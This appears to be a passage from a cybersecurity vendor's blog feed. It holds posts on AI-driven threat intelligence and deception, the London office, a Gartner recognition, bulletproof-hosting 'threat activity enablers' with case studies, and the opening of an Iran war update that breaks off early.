        <h3>1. Connecting Attacker TTPs to Your Actual Exposure</h3>
        <p>Traditionally, a threat intelligence report might tell you that a particular adversary group is exploiting a vulnerability in a specific product, or is targeting your sector using a known technique chain. Acting on that information used to require an analyst to manually map those TTPs against your environment: do we run that product? Is the vulnerable version deployed? Are the relevant network paths open? Are our detection rules adequate for that technique?</p>
        <p>AI can perform this mapping continuously and at scale. When a new threat report lands, an AI system can immediately cross-reference the described TTPs against a live model of your infrastructure, your patching state, your detection coverage, and your segmentation — and surface a prioritised assessment of actual risk, not theoretical risk. This transforms threat intelligence from awareness into actionable, environment-specific defense guidance.</p>
        <h3>2. Fusing Offensive Intelligence With Defensive Weakness Data</h3>
        <p>Defenders have long maintained two separate bodies of knowledge: external threat intelligence (what adversaries are capable of and likely to do) and internal vulnerability and exposure data (what weaknesses exist in our own environment). These have typically lived in different systems, managed by different teams, and reconciled manually and infrequently.</p>
        <p>AI enables continuous fusion of these two streams. A model can hold both the attacker’s perspective — known TTPs, targeting patterns, tooling, and objectives — and the defender’s perspective — unpatched systems, misconfigured controls, overprivileged accounts, and detection gaps — and reason about the intersection. The result is not a vulnerability list or a threat report, but an integrated picture of where the attacker’s capabilities meet our specific weaknesses. This is the analysis that the best red teams produce during an engagement, except it can now run continuously rather than quarterly.</p>
        <h3>3. Predictive Prioritisation Based on Adversary Behaviour</h3>
        <p>Patch prioritisation has traditionally been driven by CVSS scores — a measure of theoretical severity that ignores both attacker intent and environmental context. AI models trained on threat intelligence can reorder priorities based on which vulnerabilities are actually being exploited in the wild, by which adversary groups, against which sectors, using which delivery mechanisms. Combined with internal exposure data, this enables prioritisation that better reflects real-world risk rather than abstract severity.</p>
        <p>The same logic applies to detection engineering. Rather than building detections for every possible technique, AI can identify the techniques most likely to be used against your specific environment — based on who is targeting your sector, what tools they use, and where your coverage gaps are — and focus engineering effort where it matters most. In fact, in most cases AI will be able to build those detectors for you!</p>
        <h3>4. Reasoning Over Context at Scale</h3>
        <p>Traditional detection systems correlate events against rules. AI models can reason about events holistically, synthesising partial logs, ambiguous telemetry, and unusual configuration changes into a judgment that approximates what a senior analyst would conclude. Crucially, this reasoning can be informed by threat intelligence: not just “is this anomalous?” but “is this consistent with the tradecraft of groups known to target us?” That contextual layer makes detection both more accurate and more relevant.</p>
        <h3>5. Continuous Attack-Path Modelling</h3>
        <p>Historically, understanding one’s own exposure was a periodic exercise: run a penetration test, receive a report, remediate, repeat. AI enables a living model of the environment that continuously re-evaluates exploitable paths to critical assets as conditions change. When this model is enriched with threat intelligence — particularly information about which attack paths adversaries actually favour, and which tools they use to traverse them — the result is a dynamic, threat-informed view of exposure that stays up to date automatically, not only when your manual pen testers or red team have time to update it.</p>
        <h3>6. Adversarial Prediction During Active Incidents</h3>
        <p>During an active incident, experienced responders draw on their knowledge of attacker behaviour to anticipate likely next moves. AI models trained on threat intelligence and historical incident data can encode this reasoning and make it available to any response team. If the model recognises that the observed initial access technique and lateral movement pattern are consistent with a known adversary group, it can predict likely next steps — which credentials they will target, which persistence mechanisms they prefer, which data they are likely to exfiltrate — and help defenders get ahead of the intrusion rather than simply reacting to each new indicator.</p>
        <h2>Turning the Tables: AI-Enabled Deception</h2>
        <p>The capabilities described above are fundamentally defensive: detecting, predicting, and prioritising. But the convergence of AI and threat intelligence also opens a qualitatively different category of action — using intelligence about the attacker to actively mislead them.</p>
        <h3>From Static Honeypots to Adaptive Deception</h3>
        <p>Deception technologies such as honeypots and honeytokens have existed for decades, but they have always been constrained by how static and labour-intensive they are to deploy convincingly. A skilled attacker can often identify a honeypot by its lack of realistic activity, stale data, or inconsistencies with the surrounding environment. AI removes these constraints. AI-generated deception environments can include realistic-looking decoy infrastructure — fake services, plausible file shares, synthetic credentials, even simulated user activity patterns — that adapts dynamically in response to attacker behaviour. Rather than a static trap that a competent adversary recognises and avoids, the defender can maintain a deception layer that evolves to stay convincing.</p>
        <h3>Intelligence-Informed Decoy Placement</h3>
        <p>This capability ties directly into the threat intelligence fusion described above. If you know which TTPs a likely adversary uses, which attack paths they favour, and where your real weaknesses are, AI can place decoys precisely along the routes those adversaries are most likely to take. The deception is no longer generic; it is tailored to the specific threat. A decoy credential can mimic the type of service account the adversary’s tooling is known to target. A fake file share can contain documents plausible enough to absorb attacker time and attention, and simultaneously provide new intelligence about the adversary. The threat intelligence that informs your defensive posture simultaneously informs your deception strategy. This is “Machine Counter Intelligence”!</p>
        <h3>Imposing Costs and Eroding Attacker Confidence</h3>
        <p>AI-generated deception at scale inverts a piece of the traditional asymmetry. Attackers who encounter a pervasive deception layer must spend significant time and effort distinguishing real assets from fake ones. Every interaction with a decoy wastes their resources, degrades their confidence in the intelligence they have gathered, and increases the risk that they will trigger an alert. In effect, the attacker now faces a version of the defender’s dilemma: they must verify everything, while the defender only needs one decoy to succeed.</p>
        <h3>Active Intelligence Collection Through Engagement</h3>
        <p>Perhaps most significantly, AI can interact with attackers inside deception environments in ways that feel plausible, drawing out more of their tooling, techniques, and objectives. This turns deception from a passive tripwire into an active intelligence-gathering operation. The tradecraft revealed through these engagements feeds back into the threat intelligence cycle, improving the defender’s understanding of the adversary and refining future defensive and deceptive measures. The result is a virtuous loop: intelligence informs deception, deception generates new intelligence.</p>
        <p>There is an inherent tension in active deception engagement: traditional incident response doctrine prioritises minimising dwell time, while deception-based intelligence collection deliberately extends it. The risks are real — containment failure if the deception boundary isn't airtight, resource cost of sustained monitoring, potential legal and regulatory questions about why an attacker was permitted to remain active, and the possibility that a sophisticated adversary recognises the deception and feeds false signals back to poison your intelligence. These risks do not invalidate the approach, but they define the conditions under which it works. Active engagement requires genuinely isolated deception infrastructure, and clear decision frameworks for when to engage.</p>
        <h2>Democratising Access to Intelligence-Driven Defense</h2>
        <p>A less obvious but structurally significant change is that AI lowers the barrier to performing intelligence-driven defense. When an analyst can query in plain language — “which of our externally-facing systems are vulnerable to techniques used by a certain threat group in the last 90 days?” — and receive an accurate, contextualised answer, the skill requirement for effective threat-informed defense drops substantially. This is not doing an old thing faster; it is enabling a different operating model in which threat intelligence becomes a working tool for the entire security team, not just the analysts who specialise in it.</p>
        <h2>Strategic Implications</h2>
        <p>The most profound implication is that defenders have historically been reactive because they lacked the cognitive bandwidth to continuously fuse offensive intelligence with their own exposure data. AI makes this fusion not only possible but economically viable for organisations that could never previously afford dedicated threat intelligence teams, red teams, and continuous assessment programmes.</p>
        <p>This changes the nature of the defender’s dilemma. The traditional framing — “defenders must protect everything; attackers only need one way in” — assumed that defenders could not know, in real time, which parts of their attack surface are most likely to be targeted. AI-enabled threat intelligence fusion challenges that assumption. If defenders can continuously identify the most probable attack paths based on current adversary behaviour and their own specific weaknesses, they can concentrate resources where they matter most. The dilemma does not disappear, but the defender is no longer operating blindly and can take control.</p>
        <p>The key asymmetry is therefore shifting from “attacker versus defender” to “AI-augmented versus non-augmented.” Organisations that integrate AI with robust threat intelligence programmes may find themselves closer to parity with attackers than at any point in the history of the field. Those that do not will face an even steeper version of the traditional dilemma, as AI-empowered adversaries exploit the widening gap.</p>
        <h2>Final Words</h2>
        <p>The emergence of fully autonomous AI agents on both sides raises unresolved questions. If attackers deploy autonomous offensive agents that can chain exploits and adapt to defenses without human guidance, defenders will need equally <a href="https://www.recordedfuture.com/products/autonomous-threat-operations">autonomous systems</a> — systems that consume threat intelligence, assess exposure, and act on the results without waiting for human approval. The governance, trust, and control challenges this creates are substantial, but the journey towards this goal must begin now.</p>
        <p>There is also a risk that the intelligence-AI feedback loop becomes adversarial in new ways. Sophisticated attackers who understand that defenders are using AI to map TTPs against exposure may deliberately vary their tradecraft to evade predictive models, or generate false signals to misdirect AI-driven defense. The quality and provenance of threat intelligence will become even more critical as AI amplifies both its value and the consequences of acting on flawed data — we need automation-grade intelligence!</p>
        <p>We have not changed the basic equation: defenders must still know and mitigate every weakness, while the attacker needs only one. AI does not abolish that asymmetry, and claiming otherwise would be dishonest. What AI fused with threat intelligence does is change the terms of the contest. Instead of defending blind — treating every weakness as equally likely to be exploited — defenders can now continuously map attacker capabilities against their own specific exposure, concentrate resources on the paths adversaries actually use, and impose real friction through deception that degrades the attacker's speed advantage. The attacker still only needs one weakness, but they are now searching for it in an environment that fights back: one that predicts where they will look, places convincing traps along those paths, and learns from every encounter.</p>
        <p>The defender may never achieve dominance, but the era of structural helplessness — of knowing that the asymmetry is permanent and unmanageable — is ending for organisations willing to invest in these capabilities. Parity in an adversarial contest is not a consolation prize; it is the condition under which skill, preparation, and operational discipline start to matter more than structural advantage.</p>
        <p>
          <img loading="lazy" alt="Diagram showing how AI-powered Deception Networks flip the defender's dilemma in cyber defense" src="https://www.recordedfuture.com/media_1707d442f02e8e99cfdfd6d19515acdbd873428fc.png?width=750&amp;format=png&amp;optimize=medium" width="1536" height="1024" />
        </p>
      ]]></content:encoded>
            <category>Blog</category>
            <enclosure length="0" type="image/jpg" url="https://www.recordedfuture.com/blog/media_13b569c09b60aec5ed3bd7a9827785d349f512d95.png?width=1200&amp;format=pjpg&amp;optimize=medium"/>
        </item>
        <item>
            <title><![CDATA[Working in London at the World’s Largest Intelligence Company]]></title>
            <link>https://www.recordedfuture.com/blog/working-for-recorded-future-london</link>
            <guid isPermaLink="false">https://www.recordedfuture.com/blog/working-for-recorded-future-london</guid>
            <pubDate>Fri, 08 May 2026 00:00:00 GMT</pubDate>
            <description><![CDATA[See what it is like to work at the Recorded Future London office.]]></description>
            <content:encoded><![CDATA[
        <h2>Intro</h2>
        <p>There’s a certain energy you can only find at Recorded Future. Take that energy and bring it to London’s “Silicon Roundabout” and you get the perfect spot for Futurists to build and innovate.</p>
        <div>
          <div>
            <div>
              <img loading="lazy" alt="" src="https://www.recordedfuture.com/media_1b4c2914a5020e28b188422104cf064507932f990.png?width=750&amp;format=png&amp;optimize=medium" width="1416" height="942" />
            </div>
          </div>
          <div>
            <div>Recorded Future's office @ The Bower on Old Street. Source: <a href="https://www.theboweroldst.com/">https://www.theboweroldst.com/</a></div>
          </div>
        </div>
        <p>Across the globe, Recorded Future is 1000+ employees working towards the same mission: Securing Our World With Intelligence.</p>
        <p>Our London office – one of our most storied hubs – hosts a range of departments supporting local, regional, and global operations. The office brings together 100+ cross-functional professionals from People &amp; Talent Acquisition, Finance, Sales, Marketing, Global Services, Research, and more!</p>
        <h2>Looking back: From the Attic to The Bower</h2>
        <p>Our story in London didn’t start in the high-rise, but in a converted attic with just a handful of people and a big mission.</p>
        <div>
          <div>
            <div>“When I first joined, we were in the attic of a 3-story building. It was full of great people and energy; the immediate feeling I got was that everyone was building something great together.”</div>
          </div>
          <div>
            <div>
              <p>Joe Rooke</p>
              <p>Director Risk Insights, Insikt Group</p>
            </div>
          </div>
        </div>
        <p>This passion for building something great fueled incredible growth. Sam Pullen, Director of Intelligence Services, remembers when the entire EMEA team was just about 20 people. Since 2018, we’ve gone from serving a few dozen customers in the region to ~700 now.</p>
        <p>
          <img loading="lazy" alt="" src="https://www.recordedfuture.com/media_10deb562a661affd0c40624252b9254a9984c517e.png?width=750&amp;format=png&amp;optimize=medium" width="1130" height="1500" />
          <img loading="lazy" alt="" src="https://www.recordedfuture.com/media_1d271208d375759d0ff85a24b23becdece7d6bf08.png?width=750&amp;format=png&amp;optimize=medium" width="1130" height="1500" />
        </p>
        <p><strong>On the left:</strong> First Recorded Future office in London. <strong>On the right:</strong> Recorded Future's newest office</p>
        <p>
          <img loading="lazy" alt="" src="https://www.recordedfuture.com/media_1987f91030d330231b063ab5a5f15c947ad011e5f.png?width=750&amp;format=png&amp;optimize=medium" width="1536" height="2048" />
          <img loading="lazy" alt="" src="https://www.recordedfuture.com/media_188751864711b193d7a1b99cbd61b292548c6a24a.jpg?width=750&amp;format=jpg&amp;optimize=medium" width="1536" height="2048" />
        </p>
        <p><strong>On the left:</strong> First Recorded Future office in London. <strong>On the right:</strong> Recorded Future's newest office</p>
        <h2>Inside the Office</h2>
        <p>This modern high-rise building’s open-plan layout offers quite a few collaboration spaces across our office, where the team likes to have small team meetings, breaks, or even lunch.</p>
        <p>
          <img loading="lazy" alt="" src="https://www.recordedfuture.com/media_1002d0e142947532c93a5af8e8f8d572d0ce5a199.png?width=750&amp;format=png&amp;optimize=medium" width="1536" height="2048" />
          <img loading="lazy" alt="" src="https://www.recordedfuture.com/media_141b3b979302f05f0b823995a79d0fa510ee4f2b3.jpg?width=750&amp;format=jpg&amp;optimize=medium" width="1536" height="2048" />
        </p>
        <p>Like all Recorded Future offices, our meeting rooms follow a unique naming convention. While Boston uses countries and Sweden uses volcanoes, London chose islands. Rumors say we picked islands following a 95-day rain streak – we can neither confirm nor deny. So, in our London office, you’ll find Futurists collaborating in rooms like Bora Bora, Crete, and even San Andres.</p>
        <h2>Our Culture</h2>
        <p>What truly defines our London office is the sense of camaraderie – whether that’s competing in a friendly team padel game, testing your dartboard skills, or truly memorable summer &amp; end of year celebrations.</p>
        <div>
          <div>
            <div>The culture at the London office has always been welcoming and inclusive. The BDRs are the soul of the office, and you can always rely on them for a good conversation over a cup of tea.</div>
          </div>
          <div>
            <div>Sam Pullen</div>
          </div>
        </div>
        <p>Whether over summer picnics and pedalos in Hyde Park in past years, playing 5-a-side football in the pouring rain, or at the most recent Christmas party at the Savoy, our Futurists celebrate wins together.</p>
        <div>
          <div>
            <div>
              <img loading="lazy" alt="" src="https://www.recordedfuture.com/media_1681dbbda15a9f6267c8ead7b85d0818eb3cdbc92.png?width=750&amp;format=png&amp;optimize=medium" width="1536" height="2048" />
            </div>
          </div>
          <div>
            <div>
              <h6>Friendly Team Padel Game at Canary Wharf</h6>
            </div>
          </div>
        </div>
        <h2>Onwards &amp; Upwards: Why Recorded Future</h2>
        <p>We asked Sam and Joe what has been the highlight of their long tenure at Recorded Future: the opportunity to build. For Sam, it has been the opportunity to build great relationships with clients over nearly a decade. For Joe, it has been the opportunity to build new solutions and new ways to work towards our mission.</p>
        <div>
          <div>
            <div>The company offers opportunities to builders. If you are willing to take the initiative to make something better, you are not stopped. That is rare.</div>
          </div>
          <div>
            <div>
              <p>Joe Rooke</p>
              <p>Director Risk Insights, Insikt Group</p>
            </div>
          </div>
        </div>
        <p>Ready for your next move? <a href="https://www.recordedfuture.com/work-with-us">Join the team!</a></p>
      ]]></content:encoded>
            <category>Blog</category>
            <enclosure length="0" type="image/jpg" url="https://www.recordedfuture.com/blog/media_1323d11d2859ec0745253085de01bb1caae51e1c7.png?width=1200&amp;format=pjpg&amp;optimize=medium"/>
        </item>
        <item>
            <title><![CDATA[Recorded Future Named a Leader in the 2026 Gartner® Magic Quadrant™ for Cyberthreat Intelligence Technologies. And there’s more.]]></title>
            <link>https://www.recordedfuture.com/blog/recorded-future-named-a-leader</link>
            <guid isPermaLink="false">https://www.recordedfuture.com/blog/recorded-future-named-a-leader</guid>
            <pubDate>Wed, 06 May 2026 00:00:00 GMT</pubDate>
            <description><![CDATA[Recorded Future shares exciting developments since being named a leader.]]></description>
            <content:encoded><![CDATA[
        <p>For security professionals evaluating threat intelligence vendors, the Gartner Magic Quadrant offers an indispensable perspective. Gartner analysts’ thorough and nuanced analysis cuts through the noise, making it easier for teams to understand each platform’s approach, strengths, and considerations—and helping them determine whether a particular vendor fits their organization’s unique needs.</p>
        <p>That’s why we’re honored to share that Gartner has named Recorded Future a Leader in the first-ever Magic Quadrant™ for Cyberthreat Intelligence Technologies. <a href="https://go.recordedfuture.com/2026GartnerMQ.html?utm_source=website&amp;utm_medium=article&amp;utm_campaign=fy26-global-gartnermq">This new report</a> evaluated 17 vendors in the space, providing a comprehensive look at the competitive landscape.</p>
        <p>“In our view, being recognized as a Leader means something specific to us: we feel it reflects our ability to help our customers with the outcomes they depend on. These include stopping threats pre-attack, running intelligence autonomously at a scale no human team can match, and making every security control they own more effective,” said Colin Mahony, CEO, Recorded Future. “We believe this recognition reflects both the trust our customers place in us and the strength of the outcomes we help them achieve.”</p>
        <h2>A research methodology that prioritizes customer voice</h2>
        <p>A Gartner Magic Quadrant is a culmination of research in a specific market, giving you a wide-angle view of the relative positions of the market’s competitors. By applying a graphical treatment and a uniform set of evaluation criteria, a Magic Quadrant helps you quickly ascertain how well technology providers are executing their stated visions and how well they are performing against Gartner’s market view.</p>
        <p>For Recorded Future, this meant that Gartner analysts spoke directly with our customers about their real-world experiences—the challenges they face, how they use our Platform, and the outcomes they've realized. We feel their voices shaped our position in the Magic Quadrant, just as they’ve always shaped our product offerings and roadmap.</p>
        <p>The new Gartner report offers a snapshot of what the analysts heard from customers. We haven’t stopped working since then and there’s much to talk about.</p>
        <h2>There’s more… the next phase of threat intelligence</h2>
        <p>In conversations throughout 2025, our customers gave us their thoughts about product complexity, pricing models, and the challenges of scaling intelligence across their teams. As a result of their input, we’ve fundamentally changed how they can access and make the most of Recorded Future threat intelligence.</p>
        <p>Here are the highlights of our continued commitment to simplicity and innovation to provide better experiences for our customers in 2026:</p>
        <p><strong>1. Goodbye, modules. Hello, simplicity. Meet our four new solutions.</strong><br />Our <a href="https://www.recordedfuture.com/solutions-overview">four new solution areas</a> cover the four major attack surfaces—an organization’s systems, brand, supply chain, and payment methods:</p>
        <ul>
          <li><strong>Cyber Operations</strong>—This foundational solution empowers security teams with the intelligence to monitor and prioritize threats and vulnerabilities, get in-depth malware insights, triage alerts and detect threats, and stand up an intelligence-driven defense.</li>
          <li><strong>Digital Risk Protection</strong>—Also foundational, this solution allows teams to monitor malicious sites, code repositories, and the dark web to detect brand abuse, employee credential compromise, and other threats to digital trust.</li>
          <li><strong>Third-Party Risk</strong>—This solution enables teams to continuously assess supplier security posture with real-time intelligence, accurate risk ratings, vendor action plans, and more.</li>
          <li><strong>Payment Fraud</strong>—With this solution, teams can detect and prevent card-not-present fraud with intelligence that identifies compromised payment data before it's used.</li>
        </ul>
        <p>The solutions are built on a unified intelligence foundation to provide consistency, accuracy, and alignment around shared security outcomes. And they integrate with other security solutions like CrowdStrike Falcon and Google SecOps, bringing the benefits of Recorded Future intelligence and rich context directly into common SIEM and EDR workflows.</p>
        <p><strong>2. New pricing packages for less friction, more intelligence</strong><br />We’re offering the four solutions in <a href="https://www.recordedfuture.com/blog/recorded-future-solutions-packages">new pricing packages</a> designed to fit customer needs:</p>
        <ul>
          <li><strong>Simplicity</strong>—Customers can purchase one package instead of juggling multiple modules</li>
          <li><strong>End-to-end workflows</strong>—Packages cover full use cases, complete with the key capabilities to get the job done</li>
          <li><strong>Wider access</strong>—Higher tiers offer unlimited seats, so everyone now can be intelligence-led.</li>
        </ul>
        <p>In addition, integrations are included. Now your tools in the security stack—SIEM, SOAR, firewall, endpoint protection, ticketing system, and more—can leverage Recorded Future intelligence without integration fees or limitations.</p>
        <p><strong>3. Expansion into Latin America</strong><br />The threat landscape knows no geographical borders, and neither do we. We’ve expanded Recorded Future’s operations into Latin America, giving security teams in the region better access to the expertise and support they need to mount a successful proactive defense.</p>
        <p><strong>4. Autonomous Threat Operations for autonomous defense</strong><br />In February, we launched <a href="https://www.recordedfuture.com/products/autonomous-threat-operations">Autonomous Threat Operations</a> to help customers move from isolated threat intelligence insights and manual workflows to automated and continuous defensive actions across the entire security ecosystem, complete with AI-powered, 24/7 autonomous threat hunting and multi-source correlation in the Intelligence Graph®.</p>
        <p>As we continue to build on our vision of moving from automated to autonomous operations, we’re developing Recorded Future AI and agentic experiences to help our customers reduce alert fatigue, save time on research, and run threat hunts faster so they can detect and defend at scale.</p>
        <h2>Explore the Gartner Magic Quadrant report today</h2>
        <p>We’re proud to be recognized by Gartner as a Leader in Cyberthreat Intelligence Technology, and we’ll continue innovating for our customers to help them mitigate risk and stay ahead of evolving threats.</p>
        <p><a href="https://go.recordedfuture.com/2026GartnerMQ.html?utm_source=website&amp;utm_medium=article&amp;utm_campaign=fy26-global-gartnermq">Get the report</a> to review Gartner analysis and see how Recorded Future fits your CTI program needs.</p>
        <p>____________________________________________________________________________________________________________________________________</p>
        <p>Gartner, Magic Quadrant for Cyberthreat Intelligence Technologies, By <a href="https://www.gartner.com/analyst/b9c908b87ba1">Jonathan Nunez</a>, <a href="https://www.gartner.com/analyst/b9c909b579a5">Carlos De Sola Caraballo</a>, <a href="https://www.gartner.com/analyst/b9cb03bf7ca6">Jaime Anderson</a>, 04 May 2026.</p>
        <p><em>Gartner and Magic Quadrant are trademarks of Gartner, Inc. and/or its affiliates.</em></p>
        <p><em>Gartner does not endorse any company, vendor, product or service depicted in its publications, and does not advise technology users to select only those vendors with the highest ratings or other designation. Gartner publications consist of the opinions of Gartner’s business and technology insights organization and should not be construed as statements of fact. Gartner disclaims all warranties, expressed or implied, with respect to this publication, including any warranties of merchantability or fitness for a particular purpose.</em></p>
      ]]></content:encoded>
            <category>Blog</category>
            <enclosure length="0" type="image/jpg" url="https://www.recordedfuture.com/blog/media_1a5c3484e52ab4160760d9e31ebcdb3ac05008a87.png?width=1200&amp;format=pjpg&amp;optimize=medium"/>
        </item>
        <item>
            <title><![CDATA[Threat Activity Enablers: The Backbone of Today’s Threat Landscape]]></title>
            <link>https://www.recordedfuture.com/blog/threat-activity-enablers</link>
            <guid isPermaLink="false">https://www.recordedfuture.com/blog/threat-activity-enablers</guid>
            <pubDate>Wed, 06 May 2026 00:00:00 GMT</pubDate>
            <description><![CDATA[Behind every ransomware demand, botnet, or threat activity group is a server sitting in a data center.]]></description>
            <content:encoded><![CDATA[
        <div>
          <div>
            <div>This article introduces threat activity enablers (TAEs), the infrastructure providers and networks that underpin modern cyber threats across both criminal and state-sponsored activity. These entities sustain operations by enabling resilient, high-risk infrastructure that persists despite sanctions, takedowns, and public exposure.</div>
          </div>
        </div>
        <p>Behind every ransomware demand, botnet, or threat activity group is a server sitting in a data center. While most legitimate hosting providers evict threat actors once identified, a specific class of providers does the opposite. Recorded Future<sup>®</sup> calls these providers threat activity enablers (TAEs).</p>
        <h2>What Is a Threat Activity Enabler?</h2>
        <div>
          <div>
            <div>
              <img loading="lazy" alt="" src="https://www.recordedfuture.com/media_1fed9a2196f01bb447c257ef0819ce6ecec676dec.jpg?width=750&amp;format=jpg&amp;optimize=medium" width="2048" height="1908" />
            </div>
          </div>
          <div>
            <div>Figure 1: Overview of threat activity enablers’ patterns, ecosystem, and impact</div>
          </div>
        </div>
        <p>A threat activity enabler (TAE) is an individual, organization, or service provider that supports malicious cyber activity by providing infrastructure or services leveraged by threat actors. Most commonly, this includes providers that lack a formal physical or virtual storefront, conduct business only via email or messaging platforms, and do not enforce know-your-customer (KYC) policies. It also includes hosting providers that selectively respond to abuse reports or law enforcement inquiries to maintain plausible deniability, as well as more traditional self-proclaimed “bulletproof” providers that openly ignore oversight or advertise non-cooperation.</p>
        <p>TAE networks serve as the backbone for ransomware groups, infostealer campaigns, botnets, and even state-sponsored threat actor operations. What distinguishes TAE networks is the sustained concentration of malicious infrastructure within them.</p>
        <h2>How TAEs Operate</h2>
        <p>TAEs are masters of obfuscation and are highly resilient, hiding behind layers of decoy companies to evade accountability. They use several core tactics:</p>
        <ul>
          <li><strong>Corporate Shell Games</strong>: They establish front companies across multiple jurisdictions to create legal distance between the infrastructure and the operators.</li>
          <li><strong>Strategic Resource Control</strong>: They often operate as local internet registries (LIRs). This gives them direct control over IP address resources and autonomous system numbers (ASNs), allowing them to reassign and re-announce network resources at will.</li>
          <li><strong>Rapid Rebranding</strong>: When a network becomes too "hot" due to scrutiny, TAEs rapidly transfer IP address prefixes to a newly registered, clean-looking entity.</li>
        </ul>
        <h2>Identifying High-Risk TAE Networks</h2>
        <p>Recorded Future actively identifies high-risk TAE networks through its Network Threat Density List. These networks are ranked by their Threat Density Score, calculated from the concentration of validated malicious activity relative to the total number of IP address prefixes a network announces.</p>
        <p>This approach cuts through the noise to quickly expose infrastructure that is disproportionately associated with threat activity, a core characteristic of TAEs, allowing network defenders to prioritize the infrastructure most likely to pose material risk.</p>
        <div>
          <div>
            <div>
              <img loading="lazy" alt="Chart" src="https://www.recordedfuture.com/media_16c51cd61c26920af1bcad502b85b34a3369920e2.png?width=750&amp;format=png&amp;optimize=medium" width="2048" height="1386" />
            </div>
          </div>
          <div>
            <div>Figure 2: High-risk suspected or confirmed TAE networks in 2025, ranked by Threat Density Score</div>
          </div>
        </div>
        <h2>From Insight to Action</h2>
        <p>Tracking TAE networks allows security teams to move from reacting to individual threats to proactively managing infrastructure risk. In practice, this means applying TAE intelligence across three core areas: prevention, detection, and exposure.</p>
        <h2>Operationalize TAE Intelligence</h2>
        <p>Figure 3: Three steps for operationalizing TAE intelligence</p>
        <p>TAEs are persistent and continuously evolving, adapting quickly in response to sanctions, enforcement actions, and exposure. While their identities may change, their underlying infrastructure patterns often remain consistent.</p>
        <h2>The "metaspinner" Case Study</h2>
        <p>In April 2025, a TAE tracked by Recorded Future, Virtualine Technologies, shifted its IPv4 resources to a newly registered network that fraudulently impersonated a legitimate German software firm, <a href="https://www.recordedfuture.com/research/malicious-infrastructure-finds-stability-with-aurologic-gmbh">metaspinner net GmbH</a>. Because this provider’s historical infrastructure patterns were already being tracked, the newly created network was immediately identified as a front. Within weeks, this network became a primary distribution hub for malware families such as Latrodectus and AsyncRAT. When the operation was eventually exposed, Virtualine Technologies simply pivoted the infrastructure to a new identity within one of its existing autonomous systems to maintain its operations.</p>
        <div>
          <div>
            <div>
              <img loading="lazy" alt="Chart" src="https://www.recordedfuture.com/media_1d882e5b2ce38b5df856f2ffebbe35125e3e77824.png?width=750&amp;format=png&amp;optimize=medium" width="2048" height="1386" />
            </div>
          </div>
          <div>
            <div>Figure 4: Validated malicious activity associated with Virtualine Technologies in 2025</div>
          </div>
        </div>
        <p>This case underscores the reality of TAE networks: while identities, ownership records, and corporate fronts may change, the underlying infrastructure and its associated risk persist. Continuous tracking is therefore essential to identifying and prioritizing the networks that will drive future threat activity, as demonstrated by Virtualine subsequently emerging as the highest-risk TAE network in 2025.</p>
        <h2>The Stark Industries Case Study</h2>
        <p>In May 2025, the European Union sanctioned UK-registered hosting provider Stark Industries Solutions and its executives for enabling Russian state-sponsored cyber operations. However, enforcement did not halt Stark Industries’ operations. In the weeks leading up to the sanctions announcement, Stark Industries began transferring IP resources, modifying RIPE registrations, and shifting infrastructure to affiliated entities.</p>
        <div>
          <div>
            <div>
              <img loading="lazy" alt="" src="https://www.recordedfuture.com/media_190a9bd2b2490f6e609299c7228f2bf256f70bfbc.png?width=750&amp;format=png&amp;optimize=medium" width="2048" height="829" />
            </div>
          </div>
          <div>
            <div>Figure 5: Timeline of Stark Industries-related events in 2025</div>
          </div>
        </div>
        <p>Despite the sanctions, the underlying infrastructure, routing relationships, and operational patterns remained traceable across these new fronts. Continuous monitoring of TAE ecosystems enables defenders to detect these pivots in near real time, revealing continuity beneath corporate rebrands and legal restructurings. This case underscores a broader reality: sanctions may change names and ownership records, but without infrastructure-level visibility, the enabling networks behind malicious activity often persist.</p>
        <h2>What This Means for Security Leaders</h2>
        <p>TAEs represent an ongoing challenge. While individual campaigns and threat actors may come and go, the infrastructure that supports them remains adaptive and deliberately resilient.</p>
        <p>For security leaders, this requires an additional shift from solely reacting to individual indicators to understanding and prioritizing the infrastructure that enables threat activity at scale. By identifying and tracking high-risk networks, organizations can reduce investigative noise, focus resources on the most impactful threats, and take proactive steps to limit exposure before attacks materialize.</p>
        <p>Ultimately, addressing TAEs is not just about detection; it’s also about disrupting the conditions that enable modern cyber threats to operate.</p>
        <h2>Questions You Should Be Asking</h2>
        <ul>
          <li>How much of your network communicates with high-risk infrastructure?</li>
          <li>Are you prioritizing alerts involving high-risk networks?</li>
          <li>Is TAE or ASN risk intelligence integrated into your detection and triage workflows to ensure the highest-risk activity is addressed first?</li>
          <li>Do any of your third-party providers rely on TAE-linked infrastructure?</li>
          <li>Do you have hidden exposure to TAE networks?</li>
          <li>Are your controls dynamically adjusting to infrastructure risk?</li>
          <li>Can you proactively restrict or challenge traffic to and from high-risk networks?</li>
        </ul>
      ]]></content:encoded>
            <category>Blog</category>
            <enclosure length="0" type="image/jpg" url="https://www.recordedfuture.com/blog/media_10569a4d0a64470c8d18b5af323b45569f74f4659.gif?width=1200&amp;format=pjpg&amp;optimize=medium"/>
        </item>
        <item>
            <title><![CDATA[The Iran War: What You Need to Know]]></title>
            <link>https://www.recordedfuture.com/blog/the-iran-war-what-you-need-to-know</link>
            <guid isPermaLink="false">https://www.recordedfuture.com/blog/the-iran-war-what-you-need-to-know</guid>
            <pubDate>Fri, 01 May 2026 00:00:00 GMT</pubDate>
            <description><![CDATA[Insikt Group tracks the cyber, physical, and geopolitical components of the US-Israeli strikes on Iran — with continuously updated threat analysis and scenarios.]]></description>
            <content:encoded><![CDATA[
        <p><em>Last updated: 1 May 2026 at 1500 GMT</em></p>
        <div>
          <div>
            <div>
              <p><strong>New from Insikt Group: Iran War — Future Scenarios and Business Implications</strong></p>
              <p>Insikt Group has published a dedicated Cone of Plausibility analysis examining how the Iran conflict could evolve over the next 6–12 months — from a fragile ceasefire baseline to regional war, regime collapse, and nuclear crisis. Each scenario includes business implications and 0–90 day priority actions.</p>
            </div>
          </div>
          <div>
            <div><a href="https://www.recordedfuture.com/research/iran-war-future-scenarios">Read the full analysis.</a></div>
          </div>
        </div>
        <p>This report is updated as the situation evolves across the geopolitical, cyber, and influence operations dimensions of this conflict. It will be of greatest interest to organizations in the US, Israel, and Gulf states concerned about targeting by Iranian state-sponsored or state-aligned threat actors, as well as those with exposure to energy markets, maritime shipping, and critical infrastructure potentially impacted by regional escalation.</p>
        <h3>The Latest Updates</h3>
        <h3>Geopolitical Landscape</h3>
        <ul>
